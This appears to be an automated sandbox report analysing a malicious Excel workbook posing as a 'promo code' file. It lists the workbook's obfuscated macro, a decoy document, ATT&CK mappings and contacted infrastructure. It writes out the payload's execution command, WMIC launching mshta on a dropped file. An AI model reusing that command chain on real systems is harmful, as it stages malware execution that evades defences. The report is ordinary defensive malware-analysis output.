      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 0000000A.00000002.426370126.0000000003120000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\MqscKrfE.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Defaultt
      Found obfuscated Excel 4.0 MacroShow sources
      Source: promo code83874071.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 59
      Source: promo code83874071.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: promo code83874071.xlsbVirustotal: Detection: 10%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\MqscKrfE.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{5CA0BA77-A4EC-4E24-B085-82B329046A36} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal92.troj.expl.evad.winXLSB@5/6@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: promo code83874071.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: promo code83874071.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: promo code83874071.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: unknownProcess created: cmd line: mqsckrfe.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: mqsckrfe.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 0000000C.00000002.580239625.000001F147FC0000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: mshta.exe, 0000000C.00000002.580239625.000001F147FC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 0000000C.00000002.580239625.000001F147FC0000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: mshta.exe, 0000000C.00000002.580239625.000001F147FC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingProcess Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution31Logon Script (Windows)Logon Script (Windows)Scripting3Security Account ManagerSystem Information Discovery14SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      promo code83874071.xlsb10%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://roaming.edog.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://api.aadrm.com0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://ovisualuiapp.azurewebsites.net/pbiagave/0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
        high
        https://login.microsoftonline.com/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
          high
          https://shell.suite.office.com:144383AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
              high
              https://autodiscover-s.outlook.com/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                high
                https://roaming.edog.83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                • URL Reputation: safe
                unknown
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                  high
                  https://cdn.entity.83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/query83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                        high
                        https://powerlift.acompli.net83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v183AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                          high
                          https://cortana.ai83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspx83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                    high
                                    https://api.aadrm.com/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                          high
                                          https://cr.office.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                            high
                                            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://portal.office.com/account/?ref=ClientMeControl83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                              high
                                              https://graph.ppe.windows.net83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://api.aadrm.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                          high
                                                          https://dev0-api.acompli.net/autodetect83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplate83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.net83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                        high
                                                                                        https://outlook.office365.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/ios83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.net83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                              high
                                                                                                              https://substrate.office.com/search/api/v2/init83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocation83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistory83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorize83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v283AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/mac83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.ai83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.com83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ovisualuiapp.azurewebsites.net/pbiagave/83AB67A7-816A-439D-B972-9539D466DB6C.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    136.144.181.174
                                                                                                                                                    unknownNetherlands
                                                                                                                                                    20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                    Analysis ID:528041
                                                                                                                                                    Start date:24.11.2021
                                                                                                                                                    Start time:17:52:16
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 44s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:light
                                                                                                                                                    Sample file name:promo code83874071.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:20
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal92.troj.expl.evad.winXLSB@5/6@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Active AutoShape Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.76.68, 52.109.8.24, 52.109.8.23
                                                                                                                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    17:59:04API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                    17:59:07API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    136.144.181.174vote number3210109.xlsbGet hashmaliciousBrowse
                                                                                                                                                      tax77567960.xlsbGet hashmaliciousBrowse
                                                                                                                                                        hunting license-25331.xlsbGet hashmaliciousBrowse
                                                                                                                                                          vote number3210109.xlsbGet hashmaliciousBrowse
                                                                                                                                                            tax77567960.xlsbGet hashmaliciousBrowse
                                                                                                                                                              subscription-84799.xlsbGet hashmaliciousBrowse
                                                                                                                                                                hunting license-25331.xlsbGet hashmaliciousBrowse
                                                                                                                                                                  subscription-84799.xlsbGet hashmaliciousBrowse
